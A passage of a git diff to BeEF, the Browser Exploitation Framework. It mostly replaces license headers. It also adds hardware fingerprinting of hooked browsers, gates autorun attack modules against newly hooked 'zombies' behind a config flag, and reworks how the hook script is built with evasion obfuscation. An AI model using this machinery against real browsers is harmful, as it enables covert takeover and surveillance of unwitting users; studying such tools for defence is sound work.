OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF diff --git a/core/main/configuration.rb b/core/main/configuration.rb index f2469e0f4..045dd9f62 100644 --- a/core/main/configuration.rb +++ b/core/main/configuration.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF diff --git a/core/main/console/banners.rb b/core/main/console/banners.rb index 3621d20e9..bdf2c72fa 100644 --- a/core/main/console/banners.rb +++ b/core/main/console/banners.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Core @@ -40,12 +30,13 @@ module Banners def print_welcome_msg config = BeEF::Core::Configuration.instance version = config.get('beef.version') - print_info "Browser Exploitation Framework (BeEF)" - data = "Version #{version}\n" - data += "Website http://beefproject.com\n" - data += "Run 'beef -h' for basic help.\n" - data += "Run 'git pull' to update to the latest revision." + print_info "Browser Exploitation Framework (BeEF) #{version}" + data = "Twit: @beefproject\n" + data += "Site: http://beefproject.com\n" + data += "Blog: http://blog.beefproject.com\n" + data += "Wiki: https://github.com/beefproject/beef/wiki\n" print_more data + print_info "Project Creator: " + "Wade Alcorn".red + " (@WadeAlcorn)" end # @@ -89,12 +80,13 @@ module Banners def print_network_interfaces_routes configuration = BeEF::Core::Configuration.instance + prototxt = configuration.get("beef.http.https.enable") == true ? "https" : "http" self.interfaces.map do |host| # display the important URLs on each interface from the interfaces array print_success "running on network interface: #{host}" beef_host = configuration.get("beef.http.public_port") || configuration.get("beef.http.port") - data = "Hook URL: http://#{host}:#{configuration.get("beef.http.port")}#{configuration.get("beef.http.hook_file")}\n" - data += "UI URL: http://#{host}:#{configuration.get("beef.http.port")}#{configuration.get("beef.http.panel_path")}\n" + data = "Hook URL: #{prototxt}://#{host}:#{configuration.get("beef.http.port")}#{configuration.get("beef.http.hook_file")}\n" + data += "UI URL: #{prototxt}://#{host}:#{configuration.get("beef.http.port")}#{configuration.get("beef.http.panel_path")}\n" print_more data end @@ -105,13 +97,12 @@ module Banners # def print_loaded_extensions extensions = BeEF::Extensions.get_loaded - print_info "#{extensions.size} extensions loaded:" + print_info "#{extensions.size} extensions enabled." output = '' - - - extensions.each do |key,ext| - output += "#{ext['name']}\n" - end + + #extensions.each do |key,ext| + # output += "#{ext['name']}\n" + #end print_more output end diff --git a/core/main/console/commandline.rb b/core/main/console/commandline.rb index 1ad2fa025..7a06c52f9 100644 --- a/core/main/console/commandline.rb +++ b/core/main/console/commandline.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Core diff --git a/core/main/constants/browsers.rb b/core/main/constants/browsers.rb index d43e156e5..e707d67e9 100644 --- a/core/main/constants/browsers.rb +++ b/core/main/constants/browsers.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF diff --git a/core/main/constants/commandmodule.rb b/core/main/constants/commandmodule.rb index d37cc1169..ce0f6c807 100644 --- a/core/main/constants/commandmodule.rb +++ b/core/main/constants/commandmodule.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF diff --git a/core/main/constants/distributedengine.rb b/core/main/constants/distributedengine.rb index ddbf8426f..8da3eb63f 100644 --- a/core/main/constants/distributedengine.rb +++ b/core/main/constants/distributedengine.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF diff --git a/core/main/constants/hardware.rb b/core/main/constants/hardware.rb new file mode 100644 index 000000000..272cf3396 --- /dev/null +++ b/core/main/constants/hardware.rb @@ -0,0 +1,79 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# + +module BeEF +module Core +module Constants + + # @note The hardware's strings for hardware detection. + module Hardware + + HW_UNKNOWN_IMG = 'pc.png' + HW_IPHONE_UA_STR = 'iPhone' + HW_IPHONE_IMG = 'iphone.jpg' + HW_IPAD_UA_STR = 'iPad' + HW_IPAD_IMG = 'ipad.png' + HW_IPOD_UA_STR = 'iPod' + HW_IPOD_IMG = 'ipod.jpg' + HW_BLACKBERRY_UA_STR = 'BlackBerry' + HW_BLACKBERRY_IMG = 'blackberry.png' + HW_WINPHONE_UA_STR = 'Windows Phone' + HW_WINPHONE_IMG = 'win.png' + HW_ZUNE_UA_STR = 'ZuneWP7' + HW_ZUNE_IMG = 'zune.gif' + HW_KINDLE_UA_STR = 'Kindle' + HW_KINDLE_IMG = 'kindle.png' + HW_NOKIA_UA_STR = 'Nokia' + HW_NOKIA_IMG = 'nokia.ico' + HW_HTC_UA_STR = 'HTC' + HW_HTC_IMG = 'htc.ico' + HW_MOTOROLA_UA_STR = 'motorola' + HW_MOTOROLA_IMG = 'motorola.png' + HW_GOOGLE_UA_STR = 'Nexus One' + HE_GOOGLE_IM = 'nexus.png' + HW_ERICSSON_UA_STR = 'Ericsson' + HW_ERICSSON_IMG = 'sony_ericsson.png' + HW_ALL_UA_STR = 'All' + + # Attempt to match operating system string to constant + # @param [String] name Name of operating system + # @return [String] Constant name of matched operating system, returns 'ALL' if nothing are matched + def self.match_hardware(name) + case name.downcase + when /iphone/ + HW_IPHONE_UA_STR + when /ipad/ + HW_IPAD_UA_STR + when /ipod/ + HW_IPOD_UA_STR + when /blackberry/ + HW_BLACKBERRY_UA_STR + when /windows phone/ + HW_WINPHONE_UA_STR + when /zune/ + HW_ZUNE_UA_STR + when /kindle/ + HW_KINDLE_UA_STR + when /nokia/ + HW_NOKIA_UA_STR + when /motorola/ + HW_MOTOROLA_UA_STR + when /htc/ + HW_HTC_UA_STR + when /google/ + HW_GOOGLE_UA_STR + when /ericsson/ + HW_ERICSSON_UA_STR + else + 'ALL' + end + end + + end + +end +end +end diff --git a/core/main/constants/os.rb b/core/main/constants/os.rb index 2e86f1e39..7c932f17d 100644 --- a/core/main/constants/os.rb +++ b/core/main/constants/os.rb @@ -1,89 +1,78 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF -module Core -module Constants - - # @note The OS'es strings for os detection. - module Os - - OS_UNKNOWN_IMG = 'unknown.png' - OS_WINDOWS_UA_STR = 'Windows' - OS_WINDOWS_IMG = 'win.png' - OS_LINUX_UA_STR = 'Linux' - OS_LINUX_IMG = 'linux.png' - OS_MAC_UA_STR = 'Mac' - OS_MAC_IMG = 'mac.png' - OS_QNX_UA_STR = 'QNX' - OS_QNX_IMG = 'qnx.ico' - OS_BEOS_UA_STR = 'BeOS' - OS_BEOS_IMG = 'beos.png' - OS_OPENBSD_UA_STR = 'OpenBSD' - OS_OPENBSD_IMG = 'openbsd.ico' - OS_IPHONE_UA_STR = 'iPhone' - OS_IPHONE_IMG = 'iphone.png' - OS_IPAD_UA_STR = 'iPad' - OS_IPAD_IMG = 'ipad.png' - OS_IPOD_UA_STR = 'iPod' - OS_IPOD_IMG = 'ipod.jpg' - OS_MAEMO_UA_STR = 'Maemo' - OS_MAEMO_IMG = 'maemo.ico' - OS_BLACKBERRY_UA_STR = 'BlackBerry' - OS_BLACKBERRY_IMG = 'blackberry.png' - OS_ANDROID_UA_STR = 'Android' - OS_ANDROID_IMG = 'android.png' - OS_ALL_UA_STR = 'All' + module Core + module Constants + + # @note The OS'es strings for os detection. + module Os + + OS_UNKNOWN_IMG = 'unknown.png' + OS_WINDOWS_UA_STR = 'Windows' + OS_WINDOWS_IMG = 'win.png' + OS_LINUX_UA_STR = 'Linux' + OS_LINUX_IMG = 'linux.png' + OS_MAC_UA_STR = 'Mac' + OS_MAC_IMG = 'mac.png' + OS_QNX_UA_STR = 'QNX' + OS_QNX_IMG = 'qnx.ico' + OS_BEOS_UA_STR = 'BeOS' + OS_BEOS_IMG = 'beos.png' + OS_OPENBSD_UA_STR = 'OpenBSD' + OS_OPENBSD_IMG = 'openbsd.ico' + OS_IOS_UA_STR = 'iOS' + OS_IOS_IMG = 'ios.png' + OS_IPHONE_UA_STR = 'iPhone' + OS_WEBOS_UA_STR = 'webos.png' + OS_IPHONE_IMG = 'iphone.jpg' + OS_IPAD_UA_STR = 'iPad' + OS_IPAD_IMG = 'ipad.png' + OS_IPOD_UA_STR = 'iPod' + OS_IPOD_IMG = 'ipod.jpg' + OS_MAEMO_UA_STR = 'Maemo' + OS_MAEMO_IMG = 'maemo.ico' + OS_BLACKBERRY_UA_STR = 'BlackBerry' + OS_BLACKBERRY_IMG = 'blackberry.png' + OS_ANDROID_UA_STR = 'Android' + OS_ANDROID_IMG = 'android.png' + OS_ALL_UA_STR = 'All' # Attempt to match operating system string to constant # @param [String] name Name of operating system # @return [String] Constant name of matched operating system, returns 'ALL' if nothing are matched - def self.match_os(name) - case name.downcase - when /win/ - OS_WINDOWS_UA_STR - when /lin/ - OS_LINUX_UA_STR - when /os x/, /osx/, /mac/ - OS_MAC_UA_STR - when /qnx/ - OS_QNX_UA_STR - when /beos/ - OS_BEOS_UA_STR - when /openbsd/ - OS_OPENBSD_UA_STR - when /iphone/ - OS_IPHONE_UA_STR - when /ipad/ - OS_IPAD_UA_STR - when /ipod/ - OS_IPOD_UA_STR - when /maemo/ - OS_MAEMO_UA_STR - when /blackberry/ - OS_BLACKBERRY_UA_STR - when /android/ - OS_ANDROID_UA_STR - else - 'ALL' - end - end - + def self.match_os(name) + case name.downcase + when /win/ + OS_WINDOWS_UA_STR + when /lin/ + OS_LINUX_UA_STR + when /os x/, /osx/, /mac/ + OS_MAC_UA_STR + when /qnx/ + OS_QNX_UA_STR + when /beos/ + OS_BEOS_UA_STR + when /openbsd/ + OS_OPENBSD_UA_STR + when /ios/, /iphone/, /ipad/, /ipod/ + OS_IOS_UA_STR + when /maemo/ + OS_MAEMO_UA_STR + when /blackberry/ + OS_BLACKBERRY_UA_STR + when /android/ + OS_ANDROID_UA_STR + else + 'ALL' + end + end + + end + + end end - -end -end end diff --git a/core/main/crypto.rb b/core/main/crypto.rb index ae81ae5e6..cfce1054a 100644 --- a/core/main/crypto.rb +++ b/core/main/crypto.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF diff --git a/core/main/distributed_engine/models/rules.rb b/core/main/distributed_engine/models/rules.rb index 5061f96b1..ed35791d6 100644 --- a/core/main/distributed_engine/models/rules.rb +++ b/core/main/distributed_engine/models/rules.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF diff --git a/core/main/handlers/browserdetails.rb b/core/main/handlers/browserdetails.rb index dfb3b8040..79c086330 100644 --- a/core/main/handlers/browserdetails.rb +++ b/core/main/handlers/browserdetails.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Core @@ -34,6 +24,9 @@ module BeEF end def setup() + print_debug "[INIT] Processing Browser Details..." + config = BeEF::Core::Configuration.instance + # validate hook session value session_id = get_param(@data, 'beefhook') (self.err_msg "session id is invalid"; return) if not BeEF::Filters.is_valid_hook_session_id?(session_id) @@ -118,6 +111,14 @@ module BeEF self.err_msg "Invalid operating system name returned from the hook browser's initial connection." end + # get and store the hardware name + hw_name = get_param(@data['results'], 'Hardware') + if BeEF::Filters.is_valid_hwname?(hw_name) + BD.set(session_id, 'Hardware', hw_name) + else + self.err_msg "Invalid hardware name returned from the hook browser's initial connection." + end + # get and store the date date_stamp = get_param(@data['results'], 'DateStamp') if BeEF::Filters.is_valid_date_stamp?(date_stamp) @@ -222,6 +223,14 @@ module BeEF self.err_msg "Invalid value for HasFlash returned from the hook browser's initial connection." end + # get and store the yes|no value for HasPhonegap + has_phonegap = get_param(@data['results'], 'HasPhonegap') + if BeEF::Filters.is_valid_yes_no?(has_phonegap) + BD.set(session_id, 'HasPhonegap', has_phonegap) + else + self.err_msg "Invalid value for HasPhonegap returned from the hook browser's initial connection." + end + # get and store the yes|no value for HasGoogleGears has_googlegears = get_param(@data['results'], 'HasGoogleGears') if BeEF::Filters.is_valid_yes_no?(has_googlegears) @@ -263,23 +272,29 @@ module BeEF end # log a few info of newly hooked zombie in the console - print_info "New Hooked Browser [ip:#{zombie.ip}, type:#{browser_name}-#{browser_version}, os:#{os_name}], hooked domain [#{log_zombie_domain}:#{log_zombie_port.to_s}]" + print_info "New Hooked Browser [id:#{zombie.id}, ip:#{zombie.ip}, type:#{browser_name}-#{browser_version}, os:#{os_name}], hooked domain [#{log_zombie_domain}:#{log_zombie_port.to_s}]" # Call autorun modules - autorun = [] - BeEF::Core::Configuration.instance.get('beef.module').each { |k, v| - if v.has_key?('autorun') and v['autorun'] == true - if BeEF::Module.support(k, {'browser' => browser_name, 'ver' => browser_version, 'os' => os_name}) == BeEF::Core::Constants::CommandModule::VERIFIED_WORKING - BeEF::Module.execute(k, session_id) - autorun.push(k) - else - print_debug "Autorun attempted to execute unsupported module '#{k}' against Hooked browser #{zombie.ip}" + if config.get('beef.autorun.enable') + autorun = [] + BeEF::Core::Configuration.instance.get('beef.module').each { |k, v| + if v.has_key?('autorun') and v['autorun'] == true + target_status = BeEF::Module.support(k, {'browser' => browser_name, 'ver' => browser_version, 'os' => os_name}) + if target_status == BeEF::Core::Constants::CommandModule::VERIFIED_WORKING + BeEF::Module.execute(k, session_id) + autorun.push(k) + elsif target_status == BeEF::Core::Constants::CommandModule::VERIFIED_USER_NOTIFY and config.get('beef.autorun.allow_user_notify') + BeEF::Module.execute(k, session_id) + autorun.push(k) + else + print_debug "Autorun attempted to execute unsupported module '#{k}' against Hooked browser [id:#{zombie.id}, ip:#{zombie.ip}, type:#{browser_name}-#{browser_version}, os:#{os_name}]" + end end + } + if autorun.length > 0 + print_info "Autorun executed[#{autorun.join(', ')}] against Hooked browser [id:#{zombie.id}, ip:#{zombie.ip}, type:#{browser_name}-#{browser_version}, os:#{os_name}]" end - } - if autorun.length > 0 - print_info "Autorun executed: #{autorun.join(', ')} against Hooked browser #{zombie.ip}" end end diff --git a/core/main/handlers/commands.rb b/core/main/handlers/commands.rb index b96f45c6f..86f6e2685 100644 --- a/core/main/handlers/commands.rb +++ b/core/main/handlers/commands.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Core diff --git a/core/main/handlers/hookedbrowsers.rb b/core/main/handlers/hookedbrowsers.rb index a5450ac91..0e004465a 100644 --- a/core/main/handlers/hookedbrowsers.rb +++ b/core/main/handlers/hookedbrowsers.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Core diff --git a/core/main/handlers/modules/beefjs.rb b/core/main/handlers/modules/beefjs.rb index 92473876d..e36fedd7c 100644 --- a/core/main/handlers/modules/beefjs.rb +++ b/core/main/handlers/modules/beefjs.rb @@ -1,136 +1,159 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF -module Core -module Handlers -module Modules + module Core + module Handlers + module Modules - # @note Purpose: avoid rewriting several times the same code. - module BeEFJS + # @note Purpose: avoid rewriting several times the same code. + module BeEFJS - # Builds the default beefjs library (all default components of the library). - # @param [Object] req_host The request object - def build_beefjs!(req_host) - config = BeEF::Core::Configuration.instance - # @note set up values required to construct beefjs - beefjs = '' - # @note location of sub files - beefjs_path = "#{$root_dir}/core/main/client/" - # @note we load websocket library only if ws server is enabled in config.yalm - # check in init.js - if config.get("beef.http.websocket.enable") - js_sub_files = %w(lib/jquery-1.5.2.min.js lib/evercookie.js lib/json2.js beef.js browser.js browser/cookie.js browser/popup.js session.js os.js dom.js logger.js net.js updater.js encode/base64.js encode/json.js net/local.js init.js mitb.js net/dns.js websocket.js) - else - js_sub_files = %w(lib/jquery-1.5.2.min.js lib/evercookie.js lib/json2.js beef.js browser.js browser/cookie.js browser/popup.js session.js os.js dom.js logger.js net.js updater.js encode/base64.js encode/json.js net/local.js init.js mitb.js net/dns.js) - end + # Builds the default beefjs library (all default components of the library). + # @param [Object] req_host The request object + def build_beefjs!(req_host) + config = BeEF::Core::Configuration.instance + # @note set up values required to construct beefjs + beef_js = '' + # @note location of sub files + beef_js_path = "#{$root_dir}/core/main/client/" - # @note construct the beefjs string from file(s) - js_sub_files.each {|js_sub_file_name| - js_sub_file_abs_path = beefjs_path + js_sub_file_name - beefjs << (File.read(js_sub_file_abs_path) + "\n\n") - } + # @note External libraries (like jQuery) that are not evaluated with Eruby and possibly not obfuscated + ext_js_sub_files = %w(lib/jquery-1.5.2.min.js lib/evercookie.js lib/json2.js lib/jools.min.js) - # @note create the config for the hooked browser session + # @note BeEF libraries: need Eruby evaluation and obfuscation + beef_js_sub_files = %w(beef.js browser.js browser/cookie.js browser/popup.js session.js os.js hardware.js dom.js logger.js net.js updater.js encode/base64.js encode/json.js net/local.js init.js mitb.js net/dns.js net/cors.js are.js) + # @note Load websocket library only if WS server is enabled in config.yaml + if config.get("beef.http.websocket.enable") == true + beef_js_sub_files << "websocket.js" + end - hook_session_name = config.get('beef.http.hook_session_name') - hook_session_config = BeEF::Core::Server.instance.to_h + # @note antisnatchor: leave timeout.js as the last one! + beef_js_sub_files << "timeout.js" - # @note if http_host="0.0.0.0" in config ini, use the host requested by client - if hook_session_config['beef_host'].eql? "0.0.0.0" - hook_session_config['beef_host'] = req_host - hook_session_config['beef_url'].sub!(/0\.0\.0\.0/, req_host) - end + ext_js_to_obfuscate = '' + ext_js_to_not_obfuscate = '' - # @note if http_port <> public_port in config ini, use the public_port - unless hook_session_config['beef_public_port'].nil? - if hook_session_config['beef_port'] != hook_session_config['beef_public_port'] - hook_session_config['beef_port'] = hook_session_config['beef_public_port'] - hook_session_config['beef_url'].sub!(/#{hook_session_config['beef_port']}/, hook_session_config['beef_public_port']) - if hook_session_config['beef_public_port'] == '443' - hook_session_config['beef_url'].sub!(/http:/, 'https:') + # @note If Evasion is enabled, the final ext_js string will be ext_js_to_obfuscate + ext_js_to_not_obfuscate + # @note If Evasion is disabled, the final ext_js will be just ext_js_to_not_obfuscate + ext_js_sub_files.each{ |ext_js_sub_file| + if config.get("beef.extension.evasion.enable") + if config.get("beef.extension.evasion.exclude_core_js").include?(ext_js_sub_file) + print_debug "Excluding #{ext_js_sub_file} from core files obfuscation list" + # do not obfuscate the file + ext_js_sub_file_path = beef_js_path + ext_js_sub_file + ext_js_to_not_obfuscate << (File.read(ext_js_sub_file_path) + "\n\n") + else + ext_js_sub_file_path = beef_js_path + ext_js_sub_file + ext_js_to_obfuscate << (File.read(ext_js_sub_file_path) + "\n\n") + end + else + # Evasion is not enabled, do not obfuscate anything + ext_js_sub_file_path = beef_js_path + ext_js_sub_file + ext_js_to_not_obfuscate << (File.read(ext_js_sub_file_path) + "\n\n") + end + } + + # @note construct the beef_js string from file(s) + beef_js_sub_files.each { |beef_js_sub_file| + beef_js_sub_file_path = beef_js_path + beef_js_sub_file + beef_js << (File.read(beef_js_sub_file_path) + "\n\n") + } + + # @note create the config for the hooked browser session + hook_session_config = BeEF::Core::Server.instance.to_h + + # @note if http_host="0.0.0.0" in config ini, use the host requested by client + if hook_session_config['beef_host'].eql? "0.0.0.0" + hook_session_config['beef_host'] = req_host + hook_session_config['beef_url'].sub!(/0\.0\.0\.0/, req_host) + end + + # @note set the XHR-polling timeout + hook_session_config['xhr_poll_timeout'] = config.get("beef.http.xhr_poll_timeout") + + # @note if http_port <> public_port in config ini, use the public_port + unless hook_session_config['beef_public_port'].nil? + if hook_session_config['beef_port'] != hook_session_config['beef_public_port'] + hook_session_config['beef_port'] = hook_session_config['beef_public_port'] + hook_session_config['beef_url'].sub!(/#{hook_session_config['beef_port']}/, hook_session_config['beef_public_port']) + if hook_session_config['beef_public_port'] == '443' + hook_session_config['beef_url'].sub!(/http:/, 'https:') + end + end + end + + # @note Set some WebSocket properties + if config.get("beef.http.websocket.enable") + hook_session_config['websocket_secure'] = config.get("beef.http.websocket.secure") + hook_session_config['websocket_port'] = config.get("beef.http.websocket.port") + hook_session_config['ws_poll_timeout'] = config.get("beef.http.websocket.ws_poll_timeout") + hook_session_config['websocket_sec_port']= config.get("beef.http.websocket.secure_port") + end + + # @note populate place holders in the beef_js string and set the response body + eruby = Erubis::FastEruby.new(beef_js) + @hook = eruby.evaluate(hook_session_config) + + if config.get("beef.extension.evasion.enable") + evasion = BeEF::Extension::Evasion::Evasion.instance + @final_hook = ext_js_to_not_obfuscate + evasion.add_bootstrapper + evasion.obfuscate(ext_js_to_obfuscate + @hook) + else + @final_hook = ext_js_to_not_obfuscate + @hook + end + + # @note Return the final hook to be sent to the browser + @body << @final_hook + + end + + # Finds the path to js components + # @param [String] component Name of component + # @return [String|Boolean] Returns false if path was not found, otherwise returns component path + def find_beefjs_component_path(component) + component_path = component + component_path.gsub!(/beef./, '') + component_path.gsub!(/\./, '/') + component_path.replace "#{$root_dir}/core/main/client/#{component_path}.js" + + return false if not File.exists? component_path + + component_path + end + + # Builds missing beefjs components. + # @param [Array] beefjs_components An array of component names + def build_missing_beefjs_components(beefjs_components) + # @note verifies that @beef_js_cmps is not nil to avoid bugs + @beef_js_cmps = '' if @beef_js_cmps.nil? + + if beefjs_components.is_a? String + beefjs_components_path = find_beefjs_component_path(beefjs_components) + raise "Invalid component: could not build the beefjs file" if not beefjs_components_path + beefjs_components = {beefjs_components => beefjs_components_path} + end + + beefjs_components.keys.each { |k| + next if @beef_js_cmps.include? beefjs_components[k] + + # @note path to the component + component_path = beefjs_components[k] + + # @note we output the component to the hooked browser + @body << File.read(component_path)+"\n\n" + + # @note finally we add the component to the list of components already generated so it does not get generated numerous times. + if @beef_js_cmps.eql? '' + @beef_js_cmps = component_path + else + @beef_js_cmps += ",#{component_path}" + end + } end end end - - if config.get("beef.http.websocket.enable") - hook_session_config['websocket_secure'] = config.get("beef.http.websocket.secure") - hook_session_config['websocket_port'] = config.get("beef.http.websocket.port") - hook_session_config['websocket_timer'] = config.get("beef.http.websocket.alive_timer") - end - - # @note populate place holders in the beefjs string and set the response body - eruby = Erubis::FastEruby.new(beefjs) - @hook = eruby.evaluate(hook_session_config) - - if config.get("beef.extension.evasion.enable") - evasion = BeEF::Extension::Evasion::Evasion.instance - @hook = evasion.add_bootstrapper + evasion.obfuscate(@hook) - end - - @body << @hook - end - - # Finds the path to js components - # @param [String] component Name of component - # @return [String|Boolean] Returns false if path was not found, otherwise returns component path - def 